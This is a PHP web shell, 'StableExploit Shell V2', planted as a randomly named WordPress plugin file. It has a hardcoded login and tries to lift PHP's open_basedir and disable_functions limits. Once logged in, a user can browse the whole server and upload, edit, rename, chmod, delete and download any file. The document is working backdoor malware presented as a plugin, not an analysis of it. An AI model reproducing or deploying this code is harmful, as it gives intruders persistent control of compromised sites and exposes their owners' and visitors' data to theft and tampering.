File: /app/wp-content/plugins/txuyxgy/index.php
<?php
session_start();
error_reporting(0);
@ini_set('display_errors', 0);
@set_time_limit(0);
// --- CONFIGURATION ---
$auth_user = "StableExploitt";
$auth_pass = "Hahaadmin";
$bg_image = "https://i.pinimg.com/originals/f9/60/9a/f9609a3244aed8db1f2c0c71217aec03.gif";
// --- LOGIN/LOGOUT LOGIC ---
if (isset($_GET['action']) && $_GET['action'] == 'logout') {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
if (isset($_POST['login'])) {
if ($_POST['u'] === $auth_user && $_POST['p'] === $auth_pass) {
$_SESSION['is_logged'] = true;
} else {
$error_msg = "ACCESS DENIED: Wrong Credentials";
}
}
// Show Login Form if not logged in
if (!isset($_SESSION['is_logged']) || $_SESSION['is_logged'] !== true) {
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Restricted Access</title>
<style>
body {
background: url('<?=$bg_image?>') no-repeat center center fixed;
background-size: cover;
margin: 0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
font-family: 'Courier New', monospace;
overflow: hidden;
}
.login-box {
background: rgba(0, 0, 0, 0.85);
padding: 40px;
border: 1px solid #00f3ff;
border-radius: 5px;
box-shadow: 0 0 15px #00f3ff;
text-align: center;
width: 350px;
backdrop-filter: blur(5px);
}
h2 { color: #00f3ff; text-shadow: 0 0 5px #00f3ff; margin-bottom: 20px; letter-spacing: 2px; }
input {
width: 100%;
padding: 12px;
margin: 10px 0;
background: #0a0a0a;
border: 1px solid #333;
color: #00f3ff;
outline: none;
box-sizing: border-box;
font-family: 'Courier New', monospace;
}
input:focus { border-color: #00f3ff; box-shadow: 0 0 5px #00f3ff; }
button {
width: 100%;
padding: 12px;
background: rgba(0, 243, 255, 0.1);
border: 1px solid #00f3ff;
color: #fff;
cursor: pointer;
transition: 0.3s;
font-weight: bold;
font-family: 'Courier New', monospace;
margin-top: 10px;
}
button:hover { background: #00f3ff; color: #000; box-shadow: 0 0 15px #00f3ff; }
.error { color: #ff3333; margin-bottom: 15px; font-weight: bold; }
</style>
</head>
<body>
<div class="login-box">
<h2>SYSTEM LOCKED</h2>
<?php if(isset($error_msg)) echo "<div class='error'>$error_msg</div>"; ?>
<form method="post">
<input type="text" name="u" placeholder="Username" required autocomplete="off">
<input type="password" name="p" placeholder="Password" required autocomplete="off">
<button type="submit" name="login">AUTHENTICATE</button>
</form>
</div>
</body>
</html>
<?php
exit;
}
// --- SHELL LOGIC ---
// Try to bypass restrictions
if(function_exists('ini_set')) {
@ini_set('open_basedir', NULL);
@ini_set('disable_functions', '');
}
// Utilities
function w($f, $c) { return @file_put_contents($f, $c); }
function r($f) { return @file_get_contents($f); }
function perms($f) { return substr(sprintf('%o', @fileperms($f)), -4); }
function sz($f) {
$s = @filesize($f);
if ($s < 1024) return $s . ' B';
if ($s < 1048576) return round($s / 1024, 2) . ' KB';
if ($s < 1073741824) return round($s / 1048576, 2) . ' MB';
return round($s / 1073741824, 2) . ' GB';
}
// Path Management
// Fixed: Removed trim() to keep the leading slash for absolute paths
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
$path = str_replace('\\', '/', $path);
if (substr($path, -1) != '/') $path .= '/';
if (!is_dir($path)) $path = getcwd() . '/';
$msg = "";
// Handle POST Requests
if (isset($_POST['act'])) {
// Upload
if ($_POST['act'] == 'upload' && isset($_FILES['f'])) {
if (@move_uploaded_file($_FILES['f']['tmp_name'], $path . $_FILES['f']['name']))
$msg = "SUCCESS: File Uploaded!";
else
$msg = "ERROR: Upload Failed!";
}
// Create File
if ($_POST['act'] == 'mkfile' && !empty($_POST['name'])) {
if (w($path . $_POST['name'], "")) $msg = "SUCCESS: File Created!"; else $msg = "ERROR: Failed to create file!";
}
// Create Folder
if ($_POST['act'] == 'mkdir' && !empty($_POST['name'])) {
if (@mkdir($path . $_POST['name'])) $msg = "SUCCESS: Directory Created!"; else $msg = "ERROR: Failed to create directory!";
}
// Save Edited File
if ($_POST['act'] == 'save' && isset($_POST['f']) && isset($_POST['c'])) {
if (w($_POST['f'], $_POST['c'])) $msg = "SUCCESS: File Saved!"; else $msg = "ERROR: Save Failed!";
}
// Rename
if ($_POST['act'] == 'rename' && isset($_POST['old']) && isset($_POST['new'])) {
if (@rename($_POST['old'], $path . $_POST['new'])) $msg = "SUCCESS: Renamed!"; else $msg = "ERROR: Rename Failed!";
}
// Chmod
if ($_POST['act'] == 'chmod' && isset($_POST['f']) && isset($_POST['v'])) {
if (@chmod($_POST['f'], octdec($_POST['v']))) $msg = "SUCCESS: Permissions Changed!"; else $msg = "ERROR: Chmod Failed!";
}
}
// Handle GET Requests
if (isset($_GET['opt'])) {
if ($_GET['opt'] == 'delete' && isset($_GET['name'])) {
if (is_dir($_GET['name'])) @rmdir($_GET['name']); else @unlink($_GET['name']);
$msg = "SUCCESS: Item Deleted";
}
if ($_GET['opt'] == 'download' && isset($_GET['name'])) {
$file = $_GET['name'];
if (file_exists($file)) {
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Content-Length: ' . filesize($file));
readfile($file);
exit;
}
}
}
// Scanning Directory
$scandir = scandir($path);
$dirs = [];
$files = [];
foreach ($scandir as $file) {
if ($file === '.' || $file === '..') continue;
$full = $path . $file;
if (is_dir($full)) $dirs[] = $file; else $files[] = $file;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>StableExploit Shell V2</title>
<link href="https://fonts.googleapis.com/css2?family=Roboto+Mono:wght@400;700&display=swap" rel="stylesheet">
<style>
/* MAIN CYBERPUNK THEME CSS */
body {
background: url('<?=$bg_image?>') no-repeat center center fixed;
background-size: cover;
color: #e0e0e0;
font-family: 'Roboto Mono', monospace;
margin: 0;
padding: 20px;
font-size: 13px;
}
a { text-decoration: none; color: inherit; cursor: pointer; transition: 0.2s; }
.container {
background: rgba(12, 12, 12, 0.9);
border: 1px solid #333;
max-width: 1200px;
margin: 0 auto;
box-shadow: 0 0 40px rgba(0, 243, 255, 0.1);
backdrop-filter: blur(8px);
border-radius: 4px;
}
.header {
background: rgba(0, 243, 255, 0.05);
padding: 20px;
border-bottom: 1px solid #00f3ff;
display: flex;
justify-content: space-between;
align-items: center;
}
.logo {
color: #00f3ff;
font-weight: bold;
font-size: 20px;
text-shadow: 0 0 8px rgba(0, 243, 255, 0.5);
letter-spacing: 1px;
}
.sys-info { font-size: 11px; color: #888; margin-top: 5px; }
.nav-bar {
padding: 15px;
background: #111;
border-bottom: 1px solid #333;
word-break: break-all;
color: #ff00ff;
}
.nav-bar a { color: #00f3ff; }
.nav-bar a:hover { color: #fff; text-shadow: 0 0 5px #fff; }
.toolbar {
padding: 15px;
background: #0f0f0f;
border-bottom: 1px solid #333;
display: flex;
gap: 15px;
flex-wrap: wrap;
align-items: center;
}
.btn {
background: #1a1a1a;
border: 1px solid #444;
color: #ccc;
padding: 6px 14px;
font-size: 12px;
transition: all 0.3s;
cursor: pointer;
font-family: 'Roboto Mono', monospace;
}
.btn:hover { border-color: #00f3ff; color: #00f3ff; box-shadow: 0 0 8px rgba(0, 243, 255, 0.3); }
.btn-red:hover { border-color: #ff3333; color: #ff3333; box-shadow: 0 0 8px rgba(255, 51, 51, 0.3); }
table { width: 100%; border-collapse: collapse; }
th {
text-align: left;
padding: 12px;
background: rgba(0, 243, 255, 0.05);
color: #00f3ff;
border-bottom: 1px solid #333;
font-weight: bold;
}
td { padding: 8px 12px; border-bottom: 1px solid #222; color: #bbb; vertical-align: middle; }
tr:hover td { background: rgba(255, 255, 255, 0.03); color: #fff; }
.dir-link { color: #ff00ff; font-weight: bold; }
.file-link { color: #ccc; }
.file-link:hover { color: #00f3ff; }
.actions a {
margin-right: 8px;
font-size: 11px;
color: #666;
border: 1px solid #333;
padding: 2px 5px;
border-radius: 2px;
}
.actions a:hover { border-color: #999; color: #fff; }
.del-act:hover { border-color: #ff3333 !important; color: #ff3333 !important; }
.editor {
width: 100%;
height: 600px;
background: #080808;
color: #00ff00;
border: 1px solid #333;
padding: 15px;
font-family: 'Roboto Mono', monospace;
resize: vertical;
outline: none;
}
.editor:focus { border-color: #00f3ff; }
.msg {
padding: 12px;
text-align: center;
color: #000;
background: #00f3ff;
font-weight: bold;
box-shadow: 0 0 15px rgba(0, 243, 255, 0.3);
}
input[type=text], input[type=file] {
background: #000;
border: 1px solid #444;
color: #fff;
padding: 5px 8px;
font-family: 'Roboto Mono', monospace;
outline: none;
}
input[type=text]:focus { border-color: #00f3ff; }
</style>
<script>
// JS helpers for Rename and Chmod to avoid complex modals
function rename(oldName, currentPath) {
let newName = prompt("Enter New Name:", oldName);
if (newName && newName !== oldName) {
let form = document.createElement("form");
form.method = "POST";
form.action = "?path=" + currentPath;
form.innerHTML = `
<input type="hidden" name="act" value="rename">
<input type="hidden" name="old" value="${currentPath}${oldName}">
<input type="hidden" name="new" value="${newName}">
`;
document.body.appendChild(form);
form.submit();
}
}
function chmod(fileName, currentPath, currentPerms) {
let newPerm = prompt("Enter New Permissions (e.g., 0755):", currentPerms);
if (newPerm) {
let form = document.createElement("form");
form.method = "POST";
form.action = "?path=" + currentPath;
form.innerHTML = `
<input type="hidden" name="act" value="chmod">
<input type="hidden" name="f" value="${currentPath}${fileName}">
<input type="hidden" name="v" value="${newPerm}">
`;
document.body.appendChild(form);
form.submit();
}
}
</script>
</head>
<body>
<div class="container">
<div class="header">
<div>
<div class="logo">StableExploit_Commander_V2</div>
<div class="sys-info">
PHP: <?=phpversion()?> • OS: <?=php_uname('s')?> • User: <?=get_current_user()?>
</div>
</div>
<a href="?action=logout" class="btn btn-red">LOGOUT [X]</a>
</div>
<?php if($msg): ?><div class="msg"><?=$msg?></div><?php endif; ?>
<?php if (isset($_GET['edit'])):
$file = $_GET['edit'];
$content = htmlspecialchars(r($file));
?>
<div style="padding: 20px;">
<h3 style="color:#00f3ff; margin-top:0;">EDITING: <?=basename($file)?></h3>
<form method="POST">
<input type="hidden" name="act" value="save">
<input type="hidden" name="f" value="<?=$file?>">
<textarea name="c" class="editor"><?=$content?></textarea>
<div style="margin-top: 15px;">
<button type="submit" class="btn">SAVE CHANGES</button>
<a href="?path=<?=dirname($file)?>" class="btn btn-red">CANCEL</a>
</div>
</form>
</div>
<?php else: ?>
<div class="nav-bar">
PATH:
<?php
// FIX PATH DISPLAY: Removed ltrim/trim that caused issues with absolute paths
$parts = explode('/', str_replace('\\', '/', $path));
$acc = "";
foreach ($parts as $k => $p) {
// If the first part is empty, it means root '/'
if ($p == '' && $k == 0) {
$acc = "/";
continue;
}
if ($p == '') continue;
$acc .= $p . "/";
echo "<a href='?path=$acc'>$p</a> / ";
}
?>
</div>
<div class="toolbar">
<form method="POST" enctype="multipart/form-data" style="display:flex; align-items:center; gap:10px;">
<input type="hidden" name="act" value="upload">
<input type="file" name="f">
<button type="submit" class="btn">UPLOAD</button>
</form>
<span style="border-right: 1px solid #333; height: 20px; margin: 0 5px;"></span>
<form method="POST" style="display:flex; align-items:center; gap:5px;">
<input type="hidden" name="act" value="mkfile">
<input type="text" name="name" placeholder="new_file.txt">
<button type="submit" class="btn">CREATE FILE</button>
</form>
<form method="POST" style="display:flex; align-items:center; gap:5px;">
<input type="hidden" name="act" value="mkdir">
<input type="text" name="name" placeholder="new_folder">
<button type="submit" class="btn">CREATE DIR</button>
</form>
</div>
<table>
<thead>
<tr>
<th width="45%">NAME</th>
<th width="10%">SIZE</th>
<th width="10%">PERMS</th>
<th width="35%">ACTIONS</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="?path=<?=dirname($path)?>" class="dir-link" style="color:#666;">[..] PARENT DIRECTORY</a></td>
<td>DIR</td>
<td>-</td>
<td>-</td>
</tr>
<?php foreach($dirs as $d): $full = $path.$d; ?>
<tr>
<td><a href="?path=<?=$full?>" class="dir-link">📂 <?=$d?></a></td>
<td>DIR</td>
<td style="color:#00f3ff"><?=perms($full)?></td>
<td class="actions">
<a href="#" onclick="rename('<?=$d?>','<?=$path?>')">RENAME</a>
<a href="#" onclick="chmod('<?=$d?>','<?=$path?>','<?=perms($full)?>')">CHMOD</a>
<a href="?path=<?=$path?>&opt=delete&name=<?=$full?>" onclick="return confirm('Delete this directory?')" class="del-act">DELETE</a>
</td>
</tr>
<?php endforeach; ?>
<?php foreach($files as $f): $full = $path.$f; ?>
<tr>
<td><a href="?path=<?=$path?>&edit=<?=$full?>" class="file-link">📄 <?=$f?></a></td>
<td><?=sz($full)?></td>
<td style="color:#fff"><?=perms($full)?></td>
<td class="actions">
<a href="?path=<?=$path?>&edit=<?=$full?>">EDIT</a>
<a href="#" onclick="rename('<?=$f?>','<?=$path?>')">RENAME</a>
<a href="#" onclick="chmod('<?=$f?>','<?=$path?>','<?=perms($full)?>')">CHMOD</a>
<a href="?path=<?=$path?>&opt=download&name=<?=$full?>">DOWN</a>
<a href="?path=<?=$path?>&opt=delete&name=<?=$full?>" onclick="return confirm('Delete this file?')" class="del-act">DELETE</a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php endif; ?>
</div>
</body>
</html>